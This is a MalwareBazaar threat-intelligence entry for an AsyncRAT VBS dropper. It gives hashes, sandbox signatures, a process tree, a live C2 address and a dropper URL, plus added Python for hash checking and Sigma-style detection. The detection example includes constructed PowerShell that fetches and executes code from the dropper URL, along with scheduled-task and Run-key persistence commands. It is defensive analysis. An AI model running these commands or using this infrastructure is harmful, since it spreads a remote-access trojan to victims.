MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 19b9972f970ca207cf8494582bdf8c68b8a1f9cbbc9a8df0151d05c26cb9b3a1. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry

AsyncRAT

Vendor detections: 9

SHA256 hash: 19b9972f970ca207cf8494582bdf8c68b8a1f9cbbc9a8df0151d05c26cb9b3a1
SHA3-384 hash: 29cff8fd5a604084ceaf94bd16e09ff6aaca32e63117648bee14ce76cd1d7f3ead491740fb250430294957f8223d51d6
SHA1 hash: 4c632c11036d0eec042d9eddb2b351ae2ed3caf4
MD5 hash: 60ec698e60d2fb823393bc2ee1664742
humanhash: chicken-nebraska-kentucky-arizona
File name: COTIZACIÓN_23-5_Pdf.vbs
Signature: AsyncRAT
File size: 8'938'658 bytes
First seen: 2025-03-31 17:28:18 UTC
Last seen: Never
File type: Visual Basic Script (vbs)
MIME type: text/plain
ssdeep: 96:5JTmIl/6GLHWtZdJ7AZPFZI6kNl5C+VwX2vR5VU3hOGIAKJV2T45aBSSFfkD:TllyjjdVMFZNkNls2vv8hAJJV8ve
Threatray: 477 similar samples on MalwareBazaar
TLSH: T1B196A4E9B3FC7B59F6F36A0B687953490E7F3E9A627E816C101166140FB2E108D74362
TrID: 66.6% (.TXT) Text - UTF-16 (LE) encoded (2000/1); 33.3% (.MP3) MP3 audio (1000/1)
Magika: unknown
Reporter: abuse_ch
Tags: AsyncRAT vbs
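The digests above are what you check a downloaded copy against, and the TrID verdict (UTF-16 LE text behind a .vbs extension) is the detail that trips up naive string searches. The following Python is an added example, not code from the MalwareBazaar page: it recomputes the entry's digest set for a file, decodes the script according to its byte-order mark (with a heuristic for BOM-less UTF-16), and searches for string indicators as both narrow and UTF-16 "wide" strings. ENTRY_DIGESTS is copied from the entry; SAMPLE_TEXT and SAMPLE_BYTES are a constructed stand-in for a UTF-16 VBS dropper and are not the catalogued sample.

```python
import hashlib
import sys

# Digests published in the entry above, copied verbatim.
ENTRY_DIGESTS = {
    "md5": "60ec698e60d2fb823393bc2ee1664742",
    "sha1": "4c632c11036d0eec042d9eddb2b351ae2ed3caf4",
    "sha256": "19b9972f970ca207cf8494582bdf8c68b8a1f9cbbc9a8df0151d05c26cb9b3a1",
    "sha3_384": "29cff8fd5a604084ceaf94bd16e09ff6aaca32e63117648bee14ce76cd1d7f3ead491740fb250430294957f8223d51d6",
}


def digest_file(data: bytes) -> dict:
    """Compute the same digest set MalwareBazaar lists for a sample."""
    return {name: hashlib.new(name, data).hexdigest() for name in ENTRY_DIGESTS}


def verify(data: bytes, expected: dict) -> dict:
    """Per-algorithm match result of the file against the published digests."""
    actual = digest_file(data)
    return {name: actual[name] == value.lower() for name, value in expected.items()}


def decode_script(data: bytes) -> str:
    """Decode a script honouring its BOM; for BOM-less data, treat a NUL in
    most odd byte positions as UTF-16LE, otherwise fall back to UTF-8."""
    if data.startswith(b"\xff\xfe"):
        return data[2:].decode("utf-16-le")
    if data.startswith(b"\xfe\xff"):
        return data[2:].decode("utf-16-be")
    if data.startswith(b"\xef\xbb\xbf"):
        return data[3:].decode("utf-8")
    if len(data) >= 4 and data[1::2].count(0) > len(data) // 4:
        return data.decode("utf-16-le", errors="replace")
    return data.decode("utf-8", errors="replace")


def find_indicators(data: bytes, keywords) -> dict:
    """Case-insensitive search for each keyword as an ASCII string and as a
    UTF-16LE ('wide') string, mirroring YARA's ascii/wide modifiers.
    Returns keyword -> 'ascii' | 'wide' for every keyword that was found."""
    haystack = data.lower()  # bytes.lower() only touches ASCII letters, so UTF-16 NULs survive
    found = {}
    for kw in keywords:
        narrow = kw.encode("ascii").lower()
        wide = kw.encode("utf-16-le").lower()
        if narrow in haystack:
            found[kw] = "ascii"
        elif wide in haystack:
            found[kw] = "wide"
    return found


# Constructed stand-in for a UTF-16LE VBS dropper; NOT the catalogued sample.
SAMPLE_TEXT = (
    'Set sh = CreateObject("WScript.Shell")\r\n'
    'sh.Run "powershell -w hidden -ep bypass -e SQBFAFgA", 0, False\r\n'
)
SAMPLE_BYTES = ("\ufeff" + SAMPLE_TEXT).encode("utf-16-le")  # FF FE BOM + UTF-16LE body


if __name__ == "__main__":
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_BYTES
    for algo, ok in verify(blob, ENTRY_DIGESTS).items():
        print(f"{algo:9s} {'match' if ok else 'MISMATCH'}")
    print(find_indicators(blob, ["WScript.Shell", "powershell", "-ep bypass"]))
```

MalwareBazaar serves samples as a zip archive protected with the password infected; extract it inside an isolated analysis VM before hashing. The wide search is the practical point: a grep or a YARA string without the wide modifier does not match WScript.Shell in a UTF-16 encoded script, which is one reason text-type droppers like this one slip past ASCII-only indicator scans. ssdeep and TLSH are left out because they need third-party libraries.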

Intelligence


File Origin
# of uploads: 1
# of downloads: 69
Origin country: NL
Vendor Threat Intelligence
Verdict: Malicious
Score: 92.5%
Tags: autorun dropper shell sage
Result
Threat name: AsyncRAT
Detection: malicious
Classification: spre.troj.spyw.expl.evad
Score: 100 / 100
Signature
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
Bypasses PowerShell execution policy
Connects to a pastebin service (likely for C&C)
Contains functionality to log keystrokes (.Net Source)
Creates autostart registry keys with suspicious names
Creates autostart registry keys with suspicious values (likely registry only malware)
Encrypted powershell cmdline option found
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Potential dropper URLs found in powershell memory
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Paste sharing url in reverse order
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Potential Startup Shortcut Persistence Via PowerShell.EXE
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suricata IDS alerts for network traffic
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript called in batch mode (suppress errors)
Wscript starts Powershell (via cmd or directly)
Yara detected AntiVM3
Yara detected AsyncRAT
Yara detected Generic Downloader
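Several of the signatures above are Sigma-style process-creation rules: a base64-encoded PowerShell command, a FromBase64String cmdlet inside the encoded payload, a paste-sharing URL written in reverse, a script host spawning PowerShell, a Run key pointing at a suspicious folder, and schtasks launched from wscript. The following Python is an added example, not code from the page, MalwareBazaar or the sandbox vendor, that implements simplified versions of those checks over constructed Sysmon-style process events modelled on the reported execution chain. The events, their command lines and the STAGE1 script fragment are invented for the example (only the dropper URL and the xx2.vbs file name come from the entry), and the predicates are deliberately narrower than the real Sigma rules they are named after.

```python
import base64
import re
from dataclasses import dataclass

SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")
POWERSHELL = ("powershell.exe", "pwsh.exe")
SUSPICIOUS_DIRS = ("\\appdata\\local\\temp\\", "\\users\\public\\", "\\programdata\\")
PASTE_SITES = ("paste.ee", "textbin.net", "pastebin.com")
# -e / -ec / -enc / -EncodedCommand followed by a base64 token
ENC_FLAG = re.compile(r"-(?:e|ec|en|enc|encoded|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
EP_BYPASS = re.compile(r"-(?:ep|ex|exec|executionpolicy)\s+bypass", re.I)
BATCH_MODE = re.compile(r"(?:^|\s)//b(?:\s|$)", re.I)  # wscript //B suppresses error dialogs


@dataclass
class ProcessEvent:
    """Subset of Sysmon Event ID 1 / Security 4688 fields the checks need."""
    image: str
    command_line: str
    parent_image: str


def _name(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str):
    """Plaintext of a -EncodedCommand payload (base64 of UTF-16LE), or None
    when there is no such flag or the token is not valid base64/UTF-16LE."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def _visible_text(ev: ProcessEvent) -> str:
    """Command line plus its decoded payload, lower-cased for matching."""
    return (ev.command_line + " " + (decode_encoded_command(ev.command_line) or "")).lower()


CHECKS = {
    "script_host_spawns_powershell":
        lambda ev: _name(ev.parent_image) in SCRIPT_HOSTS and _name(ev.image) in POWERSHELL,
    "script_interpreter_from_suspicious_folder":
        lambda ev: _name(ev.image) in SCRIPT_HOSTS
        and any(d in ev.command_line.lower() for d in SUSPICIOUS_DIRS),
    "wscript_batch_mode":
        lambda ev: _name(ev.image) in SCRIPT_HOSTS and BATCH_MODE.search(ev.command_line) is not None,
    "encoded_powershell_command":
        lambda ev: decode_encoded_command(ev.command_line) is not None,
    "frombase64string_in_encoded_payload":
        lambda ev: "frombase64string" in (decode_encoded_command(ev.command_line) or "").lower(),
    "execution_policy_bypass":
        lambda ev: EP_BYPASS.search(ev.command_line) is not None,
    "reversed_paste_url":  # the site name appears backwards in the raw or decoded command
        lambda ev: any(site[::-1] in _visible_text(ev) for site in PASTE_SITES),
    "run_key_to_suspicious_folder":
        lambda ev: "currentversion\\run" in ev.command_line.lower()
        and any(d in ev.command_line.lower() for d in SUSPICIOUS_DIRS),
    "schtasks_from_script_host":
        lambda ev: _name(ev.image) == "schtasks.exe" and _name(ev.parent_image) in SCRIPT_HOSTS,
}


def evaluate(events):
    """Map each check that fired to the indexes of the events that fired it."""
    hits = {}
    for idx, ev in enumerate(events):
        for name, pred in CHECKS.items():
            if pred(ev):
                hits.setdefault(name, []).append(idx)
    return hits


# --- Constructed events (not sandbox output) modelled on the reported chain ---
DROPPER_URL = "https://textbin.net/raw/ezjmofz3s6"  # from the entry's Malware Config
TEMP = "C:\\Users\\user\\AppData\\Local\\Temp\\"
# Hypothetical stage 1: un-reverse the URL, fetch it, base64-decode and IEX the result.
STAGE1 = (f"$s='{DROPPER_URL[::-1]}';$u=-join $s[-1..-($s.Length)];"
          "IEX([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String((iwr $u).Content)))")
ENCODED = base64.b64encode(STAGE1.encode("utf-16-le")).decode()

EVENTS = [
    ProcessEvent("C:\\Windows\\System32\\wscript.exe",
                 f'"C:\\Windows\\System32\\WScript.exe" "{TEMP}COTIZACIÓN_23-5_Pdf.vbs" //B',
                 "C:\\Windows\\explorer.exe"),
    ProcessEvent("C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
                 f"powershell.exe -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -EncodedCommand {ENCODED}",
                 "C:\\Windows\\System32\\wscript.exe"),
    ProcessEvent("C:\\Windows\\System32\\schtasks.exe",
                 f'schtasks.exe /create /sc minute /mo 1 /tn "Update" /tr "wscript.exe {TEMP}xx2.vbs" /f',
                 "C:\\Windows\\System32\\wscript.exe"),
    ProcessEvent("C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
                 "powershell.exe -NoP -W Hidden -Command \"Set-ItemProperty -Path "
                 "'HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run' "
                 f"-Name 'Update' -Value 'wscript.exe {TEMP}xx2.vbs'\"",
                 "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"),
    ProcessEvent("C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",  # benign control
                 "powershell.exe -NoProfile -Command Get-Process",
                 "C:\\Windows\\System32\\cmd.exe"),
]

if __name__ == "__main__":
    for name, idxs in sorted(evaluate(EVENTS).items()):
        print(f"{name:45s} events {idxs}")
```

Two design points carry over to production rules. The reversed-URL check runs over the decoded -EncodedCommand payload as well as the raw command line, because in this chain the paste-site string only exists inside the encoded stage; a rule that inspects CommandLine alone sees nothing but base64. And decode_encoded_command returns None rather than raising on malformed tokens, so a crafted command line cannot crash the detector out of the pipeline.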
Behaviour
Behavior Graph (ID 1653085; sample COTIZACIÓN_23-5_Pdf.vbs; start date 31/03/2025; architecture WINDOWS; score 100)

Sample-level observations:
- DNS resolutions: paste.ee, textbin.net, bg.microsoft.map.fastly.net
- Connects to a pastebin service (likely for C&C) [paste.ee]
- Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 20 other signatures

Process tree (indentation = parent/child; signatures, network contacts and dropped files are listed under the process they were observed on):

wscript.exe  [Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); Uses schtasks.exe or at.exe to add and modify task schedules; 2 other signatures]
  powershell.exe  [Suspicious powershell command line found; Encrypted powershell cmdline option found; Bypasses PowerShell execution policy; 2 other signatures]
    powershell.exe  [Potential dropper URLs found in powershell memory]
      network: textbin.net 104.21.112.1 ports 443, 49687, 49690 (CLOUDFLARENETUS, United States); paste.ee 23.186.113.60 ports 443, 49688, 49691 (KLAYER-GLOBALNL, Reserved)
      dropped: C:\Users\user\AppData\Local\Temp\dll03.ps1 (Unicode)
      powershell.exe  [Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Writes to foreign memory regions; Injects a PE file into a foreign processes]
        dropped: __________________...________-------.lnk (MS); C:\Users\user\AppData\Local\Temp\xx2.vbs (ASCII)
        powershell.exe  [Loading BitLocker PowerShell Module]
          powershell.exe  [Creates autostart registry keys with suspicious values (likely registry only malware); Creates autostart registry keys with suspicious names]
        MSBuild.exe  [Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)]
        MSBuild.exe
          network: 196.251.89.167 ports 49697, 49703, 6900 (Web4AfricaZA, Seychelles); matches the extracted C2 196.251.89.167:6900
        2 other processes
    conhost.exe
  schtasks.exe
    conhost.exe
  schtasks.exe
    conhost.exe
powershell.exe
  wscript.exe  [Wscript starts Powershell (via cmd or directly)]
    powershell.exe  [Wscript called in batch mode (suppress errors)]
      conhost.exe
      wscript.exe
  conhost.exe
powershell.exe
  wscript.exe
    powershell.exe
      conhost.exe
      wscript.exe
  conhost.exe
2 other processes  [Wscript called in batch mode (suppress errors)]
  network: 127.0.0.1
  conhost.exe
  wscript.exe
Threat name: Script.Trojan.Heuristic
Status: Malicious
First seen: 2025-03-31 14:03:52 UTC
File Type: Text (VBS)
AV detection: 5 of 24 (20.83%)
Threat level: 2/5
Result
Malware family: asyncrat
Score: 10/10
Tags: family:asyncrat botnet:default defense_evasion discovery execution persistence rat
Behaviour
Scheduled Task/Job: Scheduled Task
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Suspicious use of SetThreadContext
Adds Run key to start application
Hide Artifacts: Hidden Window
Checks computer location settings
Drops startup file
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
AsyncRat
Asyncrat family
Malware Config
C2 Extraction: 196.251.89.167:6900
Dropper Extraction: https://textbin.net/raw/ezjmofz3s6
Please note that we are no longer able to provide a coverage score for Virus Total.

File information


The table below shows additional information about this malware sample such as delivery method and external references.

Comments